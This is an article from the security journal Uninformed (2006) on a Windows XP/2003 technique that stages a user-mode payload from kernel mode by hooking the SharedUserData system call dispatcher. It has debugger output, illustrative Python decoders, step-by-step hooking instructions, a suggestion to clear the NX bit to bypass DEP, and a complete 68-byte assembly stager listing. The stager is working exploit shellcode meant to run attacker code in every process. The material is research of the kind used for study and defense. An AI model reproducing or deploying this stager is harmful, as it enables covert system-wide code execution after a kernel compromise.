Uninformed: Informative Information for the Uninformed

Vol 3» 2006.Jan

SharedUserData SystemCall Hook

Type: R0 to R3 Stager
Size: 68 bytes
Compat: XP, 2003
Migration: Not necessary

One particularly useful approach to staging a R3 payload from R0 is to hijack the system call dispatcher at R3. Doing so requires an understanding of how system calls are dispatched in user-mode. Prior to Windows XP, system calls were dispatched through the software interrupt 0x2e, so the method described in this subsection will not work on Windows 2000. Starting with XP SP0, however, the system call interface was changed to support processor-specific instructions for system calls, such as sysenter or syscall.

To support this, Microsoft added fields to the KUSER_SHARED_DATA structure, which is symbolically known as SharedUserData, that held instructions for issuing a system call. These instructions were placed at offset 0x300 by the kernel and took a form like the code shown below:

kd> dt _KUSER_SHARED_DATA 0x7ffe0000
   +0x300 SystemCall       : [4] 0xc819cc3`340fd48b
kd> u SharedUserData!SystemCallStub L3
7ffe0300 8bd4             mov     edx,esp
7ffe0302 0f34             sysenter
7ffe0304 c3               ret
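
The quadword that dt prints for SystemCall is just those instruction bytes read as a little-endian integer. The short Python sketch below makes the correspondence explicit; the helper name qword_to_bytes is ours for illustration and is not part of any debugger.

```python
import struct

def qword_to_bytes(value: int) -> bytes:
    """Return the 8 bytes of a 64-bit value in memory order (little-endian)."""
    return struct.pack("<Q", value)

# Value shown by dt for SystemCall; the backtick in the debugger output
# is only a separator between the high and low dwords.
raw = qword_to_bytes(0x0C819CC3340FD48B)

# The first five bytes are the stub that the u command disassembles:
#   8b d4 = mov edx,esp    0f 34 = sysenter    c3 = ret
stub = raw[:5]
print(stub.hex())
```

The remaining three bytes of the quadword are whatever follows the ret in memory and are not part of the stub.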

To make use of this dynamic code block, each system call stub in ntdll.dll was implemented to make a call into the instructions found at that location.

77f7e4c3 b811000000       mov     eax,0x11
77f7e4c8 ba0003fe7f       mov     edx,0x7ffe0300
77f7e4cd ffd2             call    edx

Because SharedUserData contained executable instructions, the SharedUserData mapping had to be marked as executable. When Microsoft began work on some of the security enhancements included with XP SP2 and 2003 SP1, such as Data Execution Prevention (DEP), they presumably realized that leaving SharedUserData executable was largely unnecessary and that doing so left open the possibility for abuse. To address this, the fields in KUSER_SHARED_DATA were changed from sets of instructions to function pointers that resided within ntdll.dll. The output below shows this change:

   +0x300 SystemCall       : 0x7c90eb8b
   +0x304 SystemCallReturn : 0x7c90eb94
   +0x308 SystemCallPad    : [3] 0

To make use of the function pointers, each system call stub was changed to issue an indirect call through the SystemCall function pointer:

7c90d4de b811000000       mov     eax,0x11
7c90d4e3 ba0003fe7f       mov     edx,0x7ffe0300
7c90d4e8 ff12             call    dword ptr [edx]
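
The only difference between the two stubs is the ModRM byte that follows the 0xff opcode: d2 encodes a register-direct call, while 12 encodes a call through the memory that edx points to. The following Python sketch decodes just these two forms; the function names are illustrative, and it deliberately ignores the SIB and displacement cases.

```python
from typing import Tuple

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

def decode_modrm(byte: int) -> Tuple[int, int, int]:
    """Split an x86 ModRM byte into its (mod, reg, rm) fields."""
    return (byte >> 6) & 0b11, (byte >> 3) & 0b111, byte & 0b111

def describe_ff_call(modrm: int) -> str:
    """Describe the operand of an FF /2 near call for the two simple forms."""
    mod, reg, rm = decode_modrm(modrm)
    if reg != 2:
        raise ValueError("not an FF /2 call")
    if mod == 0b11:
        # Register-direct: the target address is the register's value.
        return f"call {REG32[rm]}"
    if mod == 0b00 and rm not in (4, 5):
        # Register-indirect: the target address is read from memory.
        return f"call dword ptr [{REG32[rm]}]"
    raise ValueError("addressing form not handled by this sketch")

print(describe_ff_call(0xD2))  # XP SP0/SP1 stub
print(describe_ff_call(0x12))  # XP SP2 / 2003 SP1 stub
```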

These details matter because the way in which the system call dispatching interfaces have been implemented can be taken advantage of. The interfaces can be manipulated in a manner that allows a payload to be staged from R0 to R3 with very little overhead. The basic idea is that a R3 payload is layered in between the system call stubs and the kernel. The R3 payload then gets an opportunity to run prior to a system call being issued within the context of an arbitrary process.

This approach has quite a few advantages. First, the staging payload is relatively small because it requires no symbol resolution or other means of directly scheduling the execution of code in an arbitrary or specific process. Second, the staging mechanism is inherently IRQL-safe because SharedUserData cannot be paged out. As a result, no migration technique has to be employed in order to get the R0 payload to a safe IRQL.

One of the disadvantages of the payload outlined below is that it relies on SharedUserData being executable. However, it should be trivial to alter the PTE for SharedUserData to clear the no-execute (NX) bit if necessary, thus eliminating the DEP concern.

Another thing to keep in mind about this stager is that the R3 payload must be written in a manner that allows it to be re-entrant. Since the R3 payload is layered between user-mode and kernel-mode for system call dispatching, it can be assumed that the payload will get called many times in many different process contexts. It is up to the R3 payload to figure out when it should do its magic and when it should not.

The following steps outline one way in which a stager of this type could be implemented.

  1. Obtain the address of the R3 payload

    In order to prepare to copy the R3 payload to SharedUserData (or some other globally-accessible region), the address of the R3 payload must first be determined. Any position-independent method will do; the listing at the end of this section uses a jmp / call / pop sequence.

  2. Copy the R3 payload to the global region

    After obtaining the address of the R3 payload, the next step would be to copy it to a globally accessible region. One such region would be in SharedUserData. This requires that SharedUserData be executable.

  3. Determine OS version

    The method used to layer between system call stubs and the kernel differs between XP SP0/SP1 and XP SP2/2003 SP1. To determine whether or not the machine is XP SP0/SP1, a comparison can be made to see if the first two bytes found at 0xffdf0300 are equal to 0xd48b (which is equivalent to a mov edx, esp instruction). If they are equal, then the operating system is assumed to be XP SP0/SP1. Otherwise, it is assumed to be XP SP2+.

  4. Hooking on XP SP0/SP1

    If the operating system version is XP SP0/SP1, hooking is accomplished by overwriting the first two bytes at 0xffdf0300 with a short jump instruction to some offset within SharedUserData that is not used, such as 0xffdf037c. Prior to doing this overwrite, a few instructions must be appended to the copied R3 payload to restore execution so that the original system call actually executes. This is accomplished by appending a mov edx, esp / mov ecx, 0x7ffe0302 / jmp ecx instruction sequence.

  5. Hooking on XP SP2+

    If the operating system version is XP SP2+, hooking is accomplished by overwriting the function pointer found at offset 0x300 within SharedUserData. Prior to overwriting the function pointer, the original function pointer must be saved and an indirect jmp instruction must be appended to the copied R3 payload so that system calls can still be processed. The original function pointer can be saved to 0xffdf0308, which is currently defined as being used for padding. The jmp instruction can therefore indirectly acquire the original system call dispatcher address from 0x7ffe0308.
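
The address arithmetic in the steps above can be checked offline with a few lines of Python. This is only a sketch that works on byte strings and integers, not on live memory. The helper names are hypothetical, and it assumes that 0xffdf0000 and 0x7ffe0000 are the kernel-mode and user-mode views of the same SharedUserData page, as the addresses used in the steps imply.

```python
import struct

KERNEL_BASE = 0xFFDF0000  # kernel-mode view of SharedUserData (assumed)
USER_BASE = 0x7FFE0000    # user-mode view of the same page

def to_user_alias(kernel_addr: int) -> int:
    """Translate a kernel-view SharedUserData address to its user-mode alias."""
    return kernel_addr - KERNEL_BASE + USER_BASE

def has_inline_stub(system_call_field: bytes) -> bool:
    """Step 3: True if the field starts with 8b d4 (mov edx,esp), i.e. XP SP0/SP1."""
    (word,) = struct.unpack_from("<H", system_call_field, 0)
    return word == 0xD48B

def short_jmp(src: int, dst: int) -> bytes:
    """Step 4: encode 'jmp short dst' placed at src (opcode eb + signed rel8)."""
    rel = dst - (src + 2)  # displacement is relative to the next instruction
    if not -128 <= rel <= 127:
        raise ValueError("target out of range for a short jump")
    return bytes([0xEB, rel & 0xFF])

sp1_field = bytes.fromhex("8bd40f34c3")      # inline stub shown earlier
sp2_field = struct.pack("<I", 0x7C90EB8B)    # function pointer shown earlier

print(has_inline_stub(sp1_field), has_inline_stub(sp2_field))
print(short_jmp(0xFFDF0300, 0xFFDF037C).hex())
print(hex(to_user_alias(0xFFDF0308)))
```

Note that the SP2 function pointer 0x7c90eb8b also begins with the byte 8b, which is why the check compares two bytes rather than one.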

The following code illustrates an implementation of this type of staging payload. It's roughly 68 bytes in size, excluding the R3 payload and the recovery method.

00000000  EB3F              jmp short 0x41
00000002  BB0103DFFF        mov ebx,0xffdf0301
00000007  4B                dec ebx
00000008  FC                cld
00000009  8D7B7C            lea edi,[ebx+0x7c]
0000000C  5E                pop esi
0000000D  57                push edi
0000000E  6A01              push byte +0x1 ; number of dwords to copy
00000010  59                pop ecx
00000011  F3A5              rep movsd
00000013  B88BD4B902        mov eax,0x2b9d48b
00000018  663903            cmp [ebx],ax
0000001B  7511              jnz 0x2e
0000001D  AB                stosd
0000001E  B803FE7FFF        mov eax,0xff7ffe03
00000023  AB                stosd
00000024  B0E1              mov al,0xe1
00000026  AA                stosb
00000027  66C703EB7A        mov word [ebx],0x7aeb
0000002C  5F                pop edi
0000002D  C3                ret ; substitute with recovery method
0000002E  8B03              mov eax,[ebx]
00000030  8D4B08            lea ecx,[ebx+0x8]
00000033  8901              mov [ecx],eax
00000035  66C707FF25        mov word [edi],0x25ff
0000003A  894F02            mov [edi+0x2],ecx
0000003D  5F                pop edi
0000003E  893B              mov [ebx],edi
00000040  C3                ret ; substitute with recovery method
00000041  E8BCFFFFFF        call 0x2

... R3 payload here ...
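
The immediates in the listing are easier to follow once they are unpacked. As a reading aid, the Python sketch below reconstructs the bytes that the two stosd instructions and the stosb write on the XP SP0/SP1 path, and recomputes the branch targets at offsets 0x00, 0x1b and 0x41. The helper names are ours, and the sketch only manipulates byte strings.

```python
import struct

def stosd(value: int) -> bytes:
    """Bytes written by stosd for a given eax (little-endian dword)."""
    return struct.pack("<I", value)

# eax values from offsets 0x13 and 0x1e, then al from offset 0x24.
trailer = stosd(0x02B9D48B) + stosd(0xFF7FFE03) + bytes([0xE1])

# 8b d4          mov edx,esp
# b9 02 03 fe 7f mov ecx,0x7ffe0302
# ff e1          jmp ecx
print(trailer.hex())
(imm32,) = struct.unpack_from("<I", trailer, 3)
print(hex(imm32))

def rel_target(offset: int, length: int, disp: int, bits: int) -> int:
    """Target of a relative branch: next-instruction offset plus signed disp."""
    if disp >= 1 << (bits - 1):
        disp -= 1 << bits
    return offset + length + disp

print(hex(rel_target(0x00, 2, 0x3F, 8)))         # jmp short
print(hex(rel_target(0x1B, 2, 0x11, 8)))         # jnz
print(hex(rel_target(0x41, 5, 0xFFFFFFBC, 32)))  # call
```

The call at offset 0x41 pushes the address of the byte that follows it, which is where the R3 payload begins, and the pop esi at offset 0x0c retrieves that address.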